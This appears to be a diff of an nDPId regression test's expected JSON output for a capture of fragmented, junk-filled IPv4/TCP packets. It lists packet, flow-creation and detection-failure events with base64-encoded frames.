00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4381,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAmtkYT5MPE1OQkhHRkRFVyM="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4382,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028653}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":4382,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkAkJV5IQkdW"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244028953,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAgo0MjE0NjMxOTgyMDUxKSh91wAA"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244028953,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAgo0MjE0NjMxOTgyMDUxKSh91wAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4384,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028953}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4384,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiomXiUkI0AjJCVeJiooKiY="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4385,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028953}
@@ -9390,8 +9390,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4694,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiNyc2RsdWhna2Zkc2JrbnY="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4695,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028956}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":4695,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAmMvLnRnZnRn"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244029256,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9HUj9HUj9zUj83NDgzOTbYPAAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244029256,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9HUj9HUj9zUj83NDgzOTbYPAAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4697,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029256}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4697,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAikoKiZeJSQjQCFAIyQlXiY="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4698,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029256}
@@ -10016,8 +10016,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5007,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAigqJl4lJCNAIyQlXiYqKCo="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5008,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244029259}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5008,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiZeJSQjJioo"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244029559,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAktJSkhHRkQyKiZERkdISkvKWwAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244029559,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAktJSkhHRkQyKiZERkdISkvKWwAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5010,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029559}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5010,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiZeJSQjI0VUUiVZXlUmSSo="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5011,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029559}
@@ -10642,8 +10642,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5320,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiI6aGRmbGtkYT5MPE1OQkg="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5321,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244029564}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5321,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdGREVXI0Ak"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244029864,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiVeSEJHVgo0MjE0NjMxOThZagAA"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244029864,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiVeSEJHVgo0MjE0NjMxOThZagAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5323,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029864}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5323,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjIwNTEpKComXiUkI0AjJCU="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5324,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029864}
@@ -11268,8 +11268,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5633,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAigqJl4lJCNyc2RsdWhna2Y="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5634,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244029868}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5634,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAmRzYmtudmMv"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244030168,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAi50Z2Z0Zz9HUj9HUj9zUj92mAAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244030168,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAi50Z2Z0Zz9HUj9HUj9zUj92mAAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5636,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030168}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5636,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjc0ODM5NikoKiZeJSQjQCE="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5637,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030168}
@@ -11894,8 +11894,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5946,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiVeJiooKSgqJl4lJCNAIyQ="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5947,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244030173}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5947,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiVeJiooKiZe"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244030473,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1534244030473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyYqKEtJSkhHRkQyKiYtwwAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030473,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244030473,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1534244030473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyYqKEtJSkhHRkQyKiYtwwAA"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5949,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030473}
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5949,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkRGR0hKSyZeJSQjI0VUUiU="}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5950,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244030473}
@@ -12520,8 +12520,8 @@
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":6259,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAgAAAAAAAAAAAAAAAAAAAAA="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":6260,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244030476}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6260,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244030473,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAgAAAAAAAAAA"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244030777,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6261,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1534244030777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030777,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAjQyMTQ2MzE5ODIwNTEpKCpc2AAA"}
